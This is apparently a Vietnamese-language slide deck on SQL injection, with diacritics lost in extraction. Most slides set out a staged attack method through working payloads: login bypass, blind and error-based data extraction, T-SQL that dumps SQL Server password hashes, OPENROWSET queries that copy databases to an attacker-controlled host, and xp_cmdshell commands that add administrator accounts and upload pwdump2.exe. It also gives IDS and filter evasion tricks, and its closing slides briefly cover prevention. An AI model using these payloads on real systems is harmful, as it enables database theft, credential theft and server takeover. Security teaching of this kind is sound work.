You are on page 1of 92

Ni dung trnh by

1/ Gii thiu s lc v SQL. 2/ Tm hiu SQL Injection. 3/ Cc phng php ca SQL Injection. 4/ K thut trn (Evasion Techniques) 5/ Phng php phng trnh.
2

What is SQL?
SQL, vit tt ca Structured Query Language (ngn ng hi c cu trc). Cng c s dng t chc, qun l v truy xut d liu uc lu tr trong cc c s d liu. SQL c th:

Thc hin cc truy vn i vi c s d liu. Ly d liu t c s d liu. Chn table mi trong mt c s d liu. Xa thng tin trong c s d liu. Cp nht cc table trong c s d liu.
4

SQL
C rt nhiu phin bn khc nhau ca ngn ng SQL : Oracle, MSSQL, MySQL Chng h tr cng cc ngn ng thao tc d liu nh (SELECT, UPDATE, DELETE, INSERT, WHERE).

SQL Database Tables


Mt c s d liu bao gm nhiu table v mi table c xc nh duy nht bi tn table. Table gm mt tp row v column: mi mt row trong table biu din cho mt thc th. V d:
userID Name LastName Login Password

1 2 3

David Thomas Tom

Bryan Brave Jerry

davidbryan thomasbra tomjerry

123456 Thomas jerry


6

SQL Queries
Vi SQL, chng ta c th truy vn CSDL v c mt kt qu tr v. S dng li table trc, truy vn s th ny:
SELECT LastName FROM users WHERE UserID = 1;

Kt qu: LastName _________ Bryan


7

SQL INJECTION L G ?
SQL injection l mt k thut cho php nhng k tn cng li dng l hng trong vic kim tra d liu nhp trong cc ng dng web v cc thng bo li ca h qun tr c s d liu Inject v thi hnh cc cu lnh SQL bt hp php.

N PH BIN TH NO?
Ngy nay c nhiu website d b tn cng. y l l hng trong pht trin ng dng web, n khng phi li ca DB hay ca web server. Hu ht cc lp trnh vin vn cha nhn thc c vn ny. Rt nhiu gii php c a ln mng nhng vn khng tt.
10

L hng ca ng dng
Hu nh tt c cc database SQL v ngn ng lp trnh u c kh nng d b tn cng.
MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc

Truy cp thng qua ng dng s dng:

Perl and CGI scripts that access databases ASP, JSP, PHP XML, XSL and XSQL Javascript VB, MFC, and other ODBC-based tools and APIs DB specific Web-based applications and APIs Reports and DB Applications 3 and 4GL-based languages (C, OCI, Pro*C, and COBOL)
11

SQL Injection hot ng th no?


Tn cng dng ng nhp
SELECT * FROM users WHERE login = 'victor' AND password = '123

C php ng nhp ASP / MS SQL Server


var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'";

12

Tn cng thng qua chui


formusr = ' or 1=1 formpwd = anything Truy vn cui cng s nh sau: SELECT * FROM users
WHERE username = ' ' or 1=1

AND password = 'anything'


13

Tnh nng ca
ng cc tham s chui Tt c sau u c xem l mt phn lnh SQL. String fields rt thng dng nhng c mt s kiu khc ca fields.
Numeric Dates

14

Nu n l kiu d liu numberic


SELECT * FROM clients WHERE account = 12345678 AND pin = 1111 PHP/MySQL login syntax $sql = "SELECT * FROM clients WHERE " . "account = $formacct AND " . "pin = $formpin";
15

Tn cng vo numberic
$formacct = 1 or 1=1 # $formpin = 1111 Truy vn cui cng:
SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111

16

Nhng k t ca SQL Injection


' or " character String Indicators -- or # single-line comment /**/ multiple-line comment + addition, concatenate (or space in url) || (double pipe) concatenate % wildcard attribute indicator ?Param1=foo&Param2=bar URL Parameters PRINT useful as non transactional command @variable local variable @@variable global variable waitfor delay '0:0:10' time delay

17

18

Content
1/ Input Validation 2/ Information gathering 3/ 1=1 Attacks 4/ Extracting Data 5/ OS Interaction 6/ OS Cmd Prompt 7/ Expand Influence
19

SQL Injection Phng php Th nghim


1) Input Validation

2) Info. Gathering

3) 1=1 Attacks

5) OS Interaction

4) Extracting Data

6) OS Cmd Prompt

7) Expand Influence
20

1) Input Validation
1) Input Validation 2) Info. Gathering

3) 1=1 Attacks

5) OS Interaction

4) Extracting Data

6) OS Cmd Prompt
7) Expand Influence

21

Pht hin l hng


L hng c th bt c ni no, SQL Injection c th xy ra trong bt k iu sau y:
Cc Fields trong Web Form Script tham s trong chui truy vn URL Cc gi tr c lu tr trong cc cookie hoc Fields n.

Bng Fuzzing:
Chui k t: ' " ) # || + > SQL reserved words with white space delimiters

%09select (tab%09, carriage return%13, linefeed%10 and space%32 with and, or, update, insert, exec, etc)
Truy vn tr hon (Delay query) ' waitfor delay '0:0:10'-22

2) Information gathering
1) Input Validation
2) Info. Gathering

3) 1=1 Attacks 4) Extracting Data

5) OS Interaction 6) OS Cmd Prompt 7) Expand Influence

23

2) Information gathering
C ch u ra. Hiu c nhng truy vn. Xc nh loi hnh c s d liu. Tm ra cp c quyn ca ngi s dng. Xc nh mc tng tc h iu hnh.

24

a) C ch u ra
S dng kt qu truy vn trong ng dng web. Error Messages Blind SQL Injection
S dng time delays hay error signatures xc nh trch xut thng tin. Chng ta c th thc hin nhiu iu nhng phng php blind Injection chm v kh khn.

Cc c ch
e-mail, SMB, FTP, TFTP

25

Li trch xut thng tin thng qua tin nhn (Error messages)
Grouping Error
' group by columnnames having 1=1 - -

Type Mismatch hay overflow errors


' union select 1,1,'text',1,1,1 - ' union select 1,1, bigint,1,1,1 - Where 'text' or bigint are being united into an int column In DBs that allow subqueries, a better way is: ' and 1 in (select 'text' ) - Trong mt s trng hp ta cn phi CAST hay CONVERT d liu ca chng ta to ra cc thng bo li.

26

Blind Injection
S dng kt qu bit.
' and condition and '1'='1

S dng iu kin if.

'; if condition waitfor delay '0:0:5' - '; union select if( condition , benchmark (100000, sha1('test')), 'false'),1,1,1,1;

Ngoi ra, chng ta c s dng tt c cc kiu truy vn nhng phi l cc thng tin khng c li. Ta s nhn c cu tr li Yes/No.
Trch xut thng tin dng vn bn bng cch chuyn i thnh m ASCII v sau chuyn t ASCII sang nh phn v sau chng ta s nhn c 1 bit. Rt tn thi gian nhng kh thi vi cng c t ng nh SQueal
27

b) Nhng truy vn
Truy vn c th l:
SELECT UPDATE EXEC INSERT Hoc ci g phc tp hn.

Context helps
Form hay Page no chng ta mun truy vn vi d liu u vo ca chng ta? Tn ca field, cookie hay tham s l g?

28

SELECT Statement
Hu ht cc Injections s c t gia lnh SELECT. Trong mnh SELECT, hu ht chng ta u kt thc bng WHERE:
SELECT *
FROM table WHERE x = 'normalinput' group by x having 1=1 -GROUP BY x HAVING x = y ORDER BY x
29

UPDATE statement
Trong phn thay i password ca app chng ta c th c nhng iu sau:
UPDATE users
SET password = ' new password' WHERE login = logged.user AND password = 'old password'

Nu inject vo new password v fix trong phn cn li, bn s thay i mi mt khu trong table.
30

Xc nh SELECT Query Structure


1. Ti to li chuyn hng (error free navigation).
C th n gin nh: ' and '1' = '1 Hoc ' and '1' = '2

2. To ra cc li c th.
Xc nh tn ca table and column ' group by columnnames having 1=1 - Do we need parenthesis? Is it a subquery?
31

Is it a stored procedure?
Chng ti s dng cc Injections khc nhau xc nh nhng iu c th hoc khng th lm.
,@variable ?Param1=foo&Param2=bar PRINT PRINT @@variable

32

Tricky Queries
Khi ta ang trong mt phn ca subquery hay lnh khi u hoc lnh kt thc.
Ta s cn s dng cc thng s thot ra. Mt s chc nng khng c sn trong subqueries (v d: group by, having and further subqueries) Trong mt s trng hp ta s cn thm vo END.

Khi s dng mt s truy vn u vo.


Ta nn kt thc vic to ra cc li khc nhau trong nhng truy vn khc nhau, n s gy ra nhm ln.

Li pht sinh trong truy vn c th lm gin on hoc c th lm ngng hng lot cc truy vn ca ta. Mt s truy vn are simply not escapable!
33

c) Xc nh loi hnh c s d liu


Hu ht cc ln thng bo li s cho ta bit ta ang lm vic vi loi hnh CSDL no. Nu ta khng c thng bo li ODBC:
We make an educated guess based on the Operating System and Web Server Hoc ta s dng nhng k t c th ca DB, lnh hoc store procedures, n s to ra cc thng bo li khc nhau

Li ODBC s hin th loi hnh c s d liu nh mt phn ca thng tin iu khin.

34

Mt s khc bit

35

Nhng khc bit khc

36

d) Tm ra cp c quyn ca ngi s dng


C mt vi SQL99 c xy dng trong cc hm v hng, n s lm vic trong hu ht trong cc trin khai SQL.
user or current_user session_user system_user

and 1 in (select user ) - '; if user ='dbo' waitfor delay '0:0:5 '- ' union select if( user() like 'root@%', benchmark(50000,sha1('test')), 'false' );

37

DB Administrators
Default administrator accounts bao gm:
sa, system, sys, dba, admin, root and many others

In MS SQL they map into dbo:


The dbo is a user that has implied permissions to perform all activities in the database. Any member of the sysadmin fixed server role who uses a database is mapped to the special user inside each database called dbo. Also, any object created by any member of the sysadmin fixed server role belongs to dbo automatically.

38

3) 1=1 Attacks
1) Input Validation 2) Info. Gathering

3) 1=1 Attacks 4) Extracting Data

5) OS Interaction 6) OS Cmd Prompt

7) Expand Influence

39

Khm ph cu trc DB
Xc nh tn ca table v column. ' group by columnnames having 1=1 - Xc nh tn kiu ca column. ' union select sum(columnname ) from tablename - Lit k table user c nh ngha.
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -40

Lit k table columns trong DB khc


MS SQL SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename ') sp_columns tablename (this stored procedure can be used instead) MySQL show columns from tablename Oracle SELECT * FROM all_tab_columns WHERE table_name='tablename ' DB2 SELECT * FROM syscat.columns WHERE tabname= 'tablename ' Postgres SELECT attnum,attname from pg_class, pg_attribute WHERE relname= 'tablename ' AND pg_class.oid=attrelid AND attnum > 0
41

Tt c table v column trong mt truy vn.


' union select 0, sysobjects.name + ': ' + syscolumns.name + ': ' + systypes.name, 1, 1, '1', 1, 1, 1, 1, 1 from sysobjects, syscolumns, systypes where sysobjects.xtype = 'U' AND sysobjects.id = syscolumns.id AND syscolumns.xtype = systypes.xtype --

42

Database Enumeration
Trong MS SQL Server, cc c s d liu c th c truy vn vi master .. Sysdatabases
CSDL khc trong Server
' and 1 in (select min(name ) from master.dbo.sysdatabases where name >'.' ) --

V tr File ca CSDL
' and 1 in (select min(filename ) from master.dbo.sysdatabases where filename >'.' ) --

43

System Tables
Oracle
SYS.USER_OBJECTS SYS.TAB SYS.USER_TEBLES SYS.USER_VIEWS SYS.ALL_TABLES SYS.USER_TAB_COLUMNS SYS.USER_CATALOG

MS Access
MsysACEs MsysObjects MsysQueries MsysRelationships

MySQL
mysql.user mysql.host mysql.db

MS SQL Server
sysobjects syscolumns systypes sysdatabases

44

4) Extracting Data
1) Input Validation 2) Info. Gathering

3) 1=1 Attacks 4) Extracting Data

5) OS Interaction 6) OS Cmd Prompt

7) Expand Influence

45

Password grabbing
Grabbing username and passwords from a User Defined table
'; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+login+'/'+password+' ' from users where login>@var select @var as var into temp end - ' and 1 in (select var from temp) - ' ; drop table temp -46

Create DB Accounts
MS SQL MySQL Access
exec sp_addlogin 'victor', 'Pass123' exec sp_addsrvrolemember 'victor', 'sysadmin' INSERT INTO mysql.user (user, host, password) VALUES ('victor', 'localhost', PASSWORD('Pass123')) CREATE USER victor IDENTIFIED BY 'Pass123' Postgres (requires UNIX account) CREATE USER victor WITH PASSWORD 'Pass123' CREATE USER victor IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; GRANT CONNECT TO victor; GRANT RESOURCE TO victor;

Oracle

47

Grabbing MS SQL Server Hashes


Truy vn n gin nh sau:
SELECT name, password FROM sysxlogins

Nhng, hashes l kiu varbinary.


hin th chng mt cch chnh xc thng qua error message ta cn phi Hex chng. V sau concatenate all Ta ch c th ph hp vi 70 cp name/password kiu varchar Ta c th thy 1 cp hon thnh.

Password field yu cu truy cp dbo.


Vi nhng c quyn thp hn ta vn c th khi phc li usernames v brute force the password

48

What do we do?
The hashes are extracted using SELECT password FROM master..sysxlogins We then hex each hash begin @charvalue='0x', @i=1, @length=datalength(@binvalue), @hexstring = '0123456789ABCDEF' while (@i<=@length) BEGIN declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int,SUBSTRING(@binvalue,@i,1)) select @firstint=FLOOR(@tempint/16) select @secondint=@tempint - (@firstint*16) select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1, 1) select @i=@i+1 END And then we just cycle through all passwords

49

y l mt lnh di:

Extracting SQL Hashes

'; begin declare @var varchar(8000), @xdate1 datetime, @binvalue varbinary(255), @charvalue varchar(255), @i int, @length int, @hexstring char(16) set @var=':' select @xdate1=(select min(xdate1) from master.dbo.sysxlogins where password is not null) begin while @xdate1 <= (select max(xdate1) from master.dbo.sysxlogins where password is not null) begin select @binvalue=(select password from master.dbo.sysxlogins where xdate1=@xdate1), @charvalue = '0x', @i=1, @length=datalength(@binvalue), @hexstring = '0123456789ABCDEF' while (@i<=@length) begin declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int, SUBSTRING(@binvalue,@i,1)) select @firstint=FLOOR(@tempint/16) select @secondint=@tempint - (@firstint*16) select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1, 1) select @i=@i+1 end select @var=@var+' | '+name+'/'+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1 select @xdate1 = (select isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@xdate1 and password is not null) end select @var as x into temp end end -50

Thu thp hashes thng qua error messages


' and 1 in (select x from temp) - ' and 1 in (select substring (x, 256, 256) from temp) - ' and 1 in (select substring (x, 512, 256) from temp) - etc ' drop table temp --

51

Brute forcing Passwords


Passwords c th b brute forced bng cch s dng sever b tn cng tip tc tin hnh. SQL Crack Script
create table tempdb..passwords( pwd varchar(255) ) bulk insert tempdb..passwords from 'c:\temp\passwords.txt' select name, pwd from tempdb..passwords inner join sysxlogins on (pwdcompare( pwd, sysxlogins.password, 0 ) = 1) union select name, name from sysxlogins where (pwdcompare( name, sysxlogins.password, 0 ) = 1) union select sysxlogins.name, null from sysxlogins join syslogins on sysxlogins.sid=syslogins.sid where sysxlogins.password is null and syslogins.isntgroup=0 and syslogins.isntuser=0 drop table tempdb..passwords

52

Transfer DB structure and data


Sau khi kt ni mng c kim tra. SQL Server c th b lin kt li vi DB ca attacker bng cch s dng OPENROWSET DB Structure b nhn rng. Data b chuyn i. iu c th c thc hin bng cch kt ni vi remote port 80!
53

Create Identical DB Structure


'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases -'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * from user_database.dbo.sysobjects -'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns -54

Transfer DB
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80; ', 'select * from mydatabase..table1') select * from database..table1 -'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80; ', 'select * from mydatabase..table2') select * from database..table2 -55

5) OS Interaction
1) Input Validation
2) Info. Gathering

3) 1=1 Attacks

5) OS Interaction

4) Extracting Data

6) OS Cmd Prompt
7) Expand Influence

56

Interacting with the OS

1. Reading and writing system files from disk


C 2 cch tng tc vi OS:

2. Thc thi trc tip command


Ta c th lm mi th.

Tm kim passwords v cu hnh files Thay i passwords and cu hnh Thc thi commands bng cch ghi ln cc cu hnh files v files khi to.

C hai u b gii hn bi cc c quyn ca c s d liu ang chy v s cho php.


57

MySQL OS Interaction
MySQL
LOAD_FILE
' union select 1,load_file('/etc/passwd'),1,1,1;

LOAD DATA INFILE


create table temp( line blob ); load data infile '/etc/passwd' into table temp; select * from temp;

SELECT INTO OUTFILE

58

MS SQL OS Interaction
MS SQL Server '; exec master..xp_cmdshell 'ipconfig > test.txt' - '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' - '; begin declare @data varchar(8000) ; set @data='| ' ; select @data=@data+txt+' | ' from tmp where txt<@data ; select @data as x into temp end - ' and 1 in (select substring(x,1,256) from temp) - '; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp --

59

Kin trc
ghi nh. Injection ca chng ta hu ht s c thc thi trn nhng server khc nhau. DB server c th khng c quyn truy cp Internet.
Web Server Application Server Database Server

Web Page Access

Input Validation Flaw

Injected SQL Execution!


60

Assessing Network Connectivity


Tn v cu hnh ca Server.
' and 1 in (select @@servername ) - ' and 1 in (select srvname from master..sysservers ) --

NetBIOS, ARP, Local Open Ports, Trace route?

Nhng kt ni ngc.
nslookup, ping ftp, tftp, smb

Ta phi kim tra firewall v proxies.

61

Thu thp thng tin IP thng qua tra cu ngc


Reverse DNS
'; exec master..xp_cmdshell 'nslookup a.com MyIP' --

Reverse Pings
'; exec master..xp_cmdshell 'ping MyIP' --

OPENROWSET
'; select * from OPENROWSET( 'SQLoledb', 'uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=MyIP,80;', 'select * from table')
62

Network Reconnaissance
S dng xp_cmdshell tt c s c thc thi nh sau:
Ipconfig /all Tracert myIP arp -a nbtstat -c netstat -ano route print
63

Network Reconnaissance Full Query


'; declare @var varchar(256); set @var = ' del test.txt && arp -a >> test.txt && ipconfig /all >> test.txt && nbtstat -c >> test.txt && netstat -ano >> test.txt && route print >> test.txt && tracert -w 10 -h 10 google.com >> test.txt'; EXEC master..xp_cmdshell @var - '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' - '; begin declare @data varchar(8000) ; set @data=': ' ; select @data=@data+txt+' | ' from tmp where txt<@data ; select @data as x into temp end - ' and 1 in (select substring(x,1,255) from temp) - '; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp -64

6) OS Cmd Prompt
1) Input Validation
2) Info. Gathering

3) 1=1 Attacks

5) OS Interaction

4) Extracting Data

6) OS Cmd Prompt
7) Expand Influence

65

Jumping to the OS
Linux based MySQL
' union select 1, (load_file('/etc/passwd')),1,1,1;

MS SQL Windows Password Creation


'; exec xp_cmdshell 'net user /add victor Pass123'- '; exec xp_cmdshell 'net localgroup /add administrators victor' --

Starting Services
'; exec master..xp_servicecontrol 'start','FTP Publishing' -66

S dng Script ActiveX T ng ha


Speech example
'; declare @o int, @var int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'x', 'x' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'warning, your sequel server has been hacked!', 1 waitfor delay '00:00:03' --

67

Ly mt khu VNC t Registry


'; declare @out binary(8) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\ORL\WinVNC3\Default', @value_name='Password', @value = @out output select cast(@out as bigint) as x into TEMP- ' and 1 in (select cast(x as varchar) from temp) -68

7) Expand Influence
1) Input Validation
2) Info. Gathering

3) 1=1 Attacks

5) OS Interaction

4) Extracting Data

6) OS Cmd Prompt
7) Expand Influence

69

Nhy vo DB Servers khc


Tm kim cc server lin kt trong MSSQL.
select * from sysservers

S dng lnh nhy OPENROWSET nhng server c th d dng t c. Cng mt cch m ta s dng trc vi vic s dng OPENROWSET i vi kt ni ngc.
70

Linked Servers
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysservers') select * from master.dbo.sysservers '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_linked_sysservers') select * from LinkedServer.master.dbo.sysservers '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_linked_sysdatabases') select * from LinkedServer.master.dbo.sysdatabases
71

Thc hin thng qua cc stored procedure t xa


Nu my ch t xa c cu hnh ch cho stored procedure thc hin, iu thay i c thc hin nh sau:
insert into OPENROWSET('SQLoledb', 'uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=myIP,80;', 'select * from mydatabase..hacked_sysservers') exec Linked_Server.master.dbo.sp_executesql N'select * from master.dbo.sysservers' insert into OPENROWSET('SQLoledb', 'uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') exec Linked_Server.master.dbo.sp_executesql N'select * from master.dbo.sysdatabases'
72

Uploading files thng qua reverse connection


'; create table AttackerTable (data text) - '; bulk insert AttackerTable -from 'pwdump2.exe' with (codepage='RAW') '; exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Micro soft\MSSQLServer\Client\ConnectTo',' MySrvAlias','REG_SZ','DBMSSOCN, MyIP, 80' '; exec xp_cmdshell 'bcp "select * from AttackerTable" queryout pwdump2.exe -c -Craw -SMySrvAlias -Uvictor -PPass123' -73

Uploading files thng qua SQL Injection


Nu database server khng c kt ni Internet, file vn c th c ti ln Qu trnh tng t nhng cc file phi c hexed v c gi nh l mt phn ca mt chui truy vn. Cc File phi c chia thnh tng phn nh (4.000 byte trn mi phn).

74

V d SQL injection file uploading


The whole set of queries is lengthy u tin ta cn phi Inject stored procedure convert hex thnh binary t xa. Sau ta cn phi Inject the binary as hex in 4000 byte chunks
' declare @hex varchar(8000), @bin varchar(8000) select @hex = '4d5a900003000 8000 hex chars 0000000000000000000' exec master..sp_hex2bin @hex, @bin output ; insert master..pwdump2 select @bin --

Cui cng ta concatenate the binaries and dump the file to disk.
75

K THUT TRN (EVASION TECHNIQUES)

76

Content
Evasion Techniques IDS Signature Evasion Input validation Evasion and Circumvention MySQL Input Validation Circumvention using Char() IDS Signature Evasion using white spaces IDS Signature Evasion using comments IDS Signature Evasion using string concatenation IDS and Input Validation Evasion using variables
77

Evasion Techniques
nh la s xc nhn u vo v nhng k thut IDS Evasion cng tng t. S pht hin da trn Snort ca SQL Injection mt phn l c th nhng tr li da trn "signatures. Signatures c th b du d dng. Xc nhn u vo, IDS detection v strong database v OS hardening phi c s dng cng nhau.
78

IDS Signature Evasion


Evading ' OR 1=1 signature ' OR 'unusual' = 'unusual' ' OR 'something' = 'some'+'thing' ' OR 'text' = N'text' ' OR 'something' like 'some%' ' OR 2 > 1 ' OR 'text' > 't' ' OR 'whatever' IN ('whatever') ' OR 2 BETWEEN 1 AND 3
79

Mt s ngi s dng hm addslashes() trong PHP gii phng cc k t.


single quote (') double quote (") backslash (\) NUL (the NULL byte)

Xc nhn u vo(Input validation)

iu ny c th du i d dng bng cch s dng s thay th cho mt s k t trc trong numeric field.
80

Evasion and Circumvention


IDS and xc nhn u vo ph v bng cch m ha Mt s cch m ha cc thng s.
URL encoding Unicode/UTF-8 Hex enconding char() function

81

MySQL Input Validation Circumvention using Char()


Inject without quotes (string = "%"): ' or username like char(37); Inject without quotes (string = "root"): ' union select * from users where login = char(114,111,111,116); Load files in unions (string = "/etc/passwd"): ' union select 1, (load_file(char(47,101,116,99,47,112,97,115,115,119,1 00))),1,1,1; Check for existing files (string = "n.ext"): ' and 1=( if( (load_file(char(110,46,101,120,116))<>char(39,39)),1, 0));
82

IDS Signature Evasion using white spaces


UNION SELECT signature is different to UNION SELECT
Tab, carriage return, linefeed or several white spaces c th c s dng.

Dropping spaces might work even better


'OR'1'='1' (with no spaces) din gii mt cch chnh xc bi mt s cc c s d liu SQL thn thin.
83

IDS Signature Evasion using comments


Mt s IDS ko b nh la bng white spaces S dng comments l s thay th tuyt vi.
/* */ is used in SQL99 to delimit multirow comments UNION/**/SELECT/**/ '/**/OR/**/1/**/=/**/1 iu ny cng cho php ly lan injection thng qua multiple fields
USERNAME: ' or 1/* PASSWORD: */ =1 --

84

IDS Signature Evasion using string concatenation


Trong MySQL iu ny l c th tch nhng hng dn vi comments.
UNI/**/ON SEL/**/ECT

Hoc ta c th concatenate text v s dng hng dn c th thc thi.


Oracle
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'

MS SQL
'; EXEC ('SEL' + 'ECT US' + 'ER')

85

IDS and Input Validation Evasion using variables


Tuy nhin, k thut evasion cho php nh ngha cc bin.
; declare @x nvarchar(80); set @x = N'SEL' + N'ECT US' + N'ER'); EXEC (@x) EXEC SP_EXECUTESQL @x

Hay c th s dng hex value


; declare @x varchar(80); set @x = 0x73656c65637420404076657273696f6e; EXEC (@x) This statement uses no single quotes (')

86

Nh vy, c th thy li SQL injection khai thc nhng bt cn ca cc lp trnh vin pht trin ng dng web khi x l cc d liu nhp vo xy dng cu lnh SQL. Tc hi t li SQL injection ty thuc vo mi trng v cch cu hnh h thng. Nu ng dng s dng dbo khi thao tc d liu, n c th xa ton b cc bng d liu, to cc bng d liu mi. Nu ng dng s dng quyn sa n c th iu khin ton b h qun tr database => iu khin h thng ca bn
87

88

Content
Kim sot cht ch d liu nhp vo. Thit lp cu hnh an ton cho h qun tr c s d liu.

89

Kim sot cht ch d liu nhp vo


Kim sot cht ch tt c cc d liu nhp nhn c t i tng Request. Trong trng hp d liu nhp vo l s kim tra d liu c ng kiu hay khng bng hm IsNumeric(). C th gii hn chiu di cachui nhp liu, hoc xy dng hm EscapeQuotes thay th cc du nhy n bng 2 du nhy n.
90

Thit lp cu hnh an ton cho h qun tr c s d liu


Cn c c ch kim sot cht ch v gii hn quyn x l d liu n ti khon ngi dng. Cc ng dng thng thng nn trnh dng n cc quyn nh dbo hay sa. Loi b bt k thng tin k thut no cha trong thng ip chuyn xung cho ngi dng khi ng dng c li Cc thng bo li thng thng tit l cc chi tit k thut c th cho php k tn cng bit c im yu ca h thng.
91

92

You might also like